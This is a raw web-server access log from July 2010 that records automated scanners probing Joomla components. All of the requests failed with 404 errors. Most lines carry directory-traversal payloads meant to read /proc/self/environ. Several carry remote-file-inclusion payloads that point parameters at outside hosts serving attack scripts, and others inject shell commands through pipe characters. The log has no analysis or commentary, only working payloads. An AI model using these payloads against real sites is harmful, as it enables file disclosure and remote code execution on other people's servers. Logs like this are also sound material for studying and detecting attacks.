91.215.170.13 - - [26/Jul/2010:08:01:12 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:01:13 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:01:13 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
114.108.151.149 - - [26/Jul/2010:08:01:36 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:02:42 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
66.187.106.151 - - [26/Jul/2010:08:02:57 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.831"
66.187.106.151 - - [26/Jul/2010:08:03:10 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
114.108.151.149 - - [26/Jul/2010:08:03:31 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:04:53 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
91.215.170.13 - - [26/Jul/2010:08:05:55 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:05:55 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:05:55 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
114.108.151.149 - - [26/Jul/2010:08:09:49 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
205.234.145.217 - - [26/Jul/2010:08:10:11 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:10:11 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:10:11 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:10:31 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:10:51 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:10:52 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:10:53 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:10:59 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:25 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:25 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:25 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:27 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:43 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:43 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:44 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:44 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:49 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:49 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:11:49 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
114.108.151.149 - - [26/Jul/2010:08:12:56 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
74.81.81.17 - - [26/Jul/2010:08:13:19 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:13:19 +0200] "GET /logs//index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:13:19 +0200] "GET //index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:13:19 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:13:19 +0200] "GET /logs//index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:13:20 +0200] "GET //index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
205.234.145.217 - - [26/Jul/2010:08:13:28 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:13:29 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:13:29 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:17 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:17 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:17 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:23 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:23 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:23 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:48 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:48 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:14:48 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
87.98.217.83 - - [26/Jul/2010:08:15:55 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:08:15:55 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:08:15:55 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:08:15:55 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:08:15:55 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:08:15:55 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
91.137.131.51 - - [26/Jul/2010:08:17:06 +0200] "GET //index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
91.137.131.51 - - [26/Jul/2010:08:17:06 +0200] "GET /logs//index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
91.137.131.51 - - [26/Jul/2010:08:17:06 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
91.137.131.51 - - [26/Jul/2010:08:17:06 +0200] "GET //index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
91.137.131.51 - - [26/Jul/2010:08:17:06 +0200] "GET /logs//index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
91.137.131.51 - - [26/Jul/2010:08:17:06 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:17:53 +0200] "GET /logs//index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:17:53 +0200] "GET //index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:17:53 +0200] "GET /logs//index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:17:54 +0200] "GET //index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:17:54 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:17:55 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
91.215.170.13 - - [26/Jul/2010:08:18:11 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:18:12 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:18:12 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
114.108.151.149 - - [26/Jul/2010:08:24:55 +0200] "GET /logs/access_log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:24:56 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:24:56 +0200] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:26:51 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:26:51 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:26:52 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:28:42 +0200] "GET /logs/access_log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:28:43 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:28:43 +0200] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
74.81.81.17 - - [26/Jul/2010:08:28:54 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:28:54 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:28:54 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:28:54 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:28:54 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:28:54 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
114.108.151.149 - - [26/Jul/2010:08:29:57 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:29:57 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:29:58 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
67.205.67.73 - - [26/Jul/2010:08:31:18 +0200] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 327 "-" "Mozilla/5.0"
67.205.67.73 - - [26/Jul/2010:08:31:18 +0200] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 322 "-" "Mozilla/5.0"
67.205.67.73 - - [26/Jul/2010:08:31:18 +0200] "GET /logs/access_log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 340 "-" "Mozilla/5.0"
202.160.123.72 - - [26/Jul/2010:08:31:23 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
67.205.67.73 - - [26/Jul/2010:08:31:28 +0200] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 327 "-" "Mozilla/5.0"
67.205.67.73 - - [26/Jul/2010:08:31:28 +0200] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 322 "-" "Mozilla/5.0"
67.205.67.73 - - [26/Jul/2010:08:31:29 +0200] "GET /logs/access_log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 340 "-" "Mozilla/5.0"
62.141.52.11 - - [26/Jul/2010:08:31:56 +0200] "GET /logs//index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:31:56 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:32:00 +0200] "GET //index.php?option=com_sbsfile&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:32:02 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:32:02 +0200] "GET /logs//index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:32:05 +0200] "GET //index.php?option=com_sbsfile&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
121.78.118.123 - - [26/Jul/2010:08:32:33 +0200] "GET /logs/access_log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:08:32:34 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:08:32:34 +0200] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
203.105.83.126 - - [26/Jul/2010:08:35:12 +0200] "GET /logs/access_log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 338 "-" "Jcomers Bot Scan"
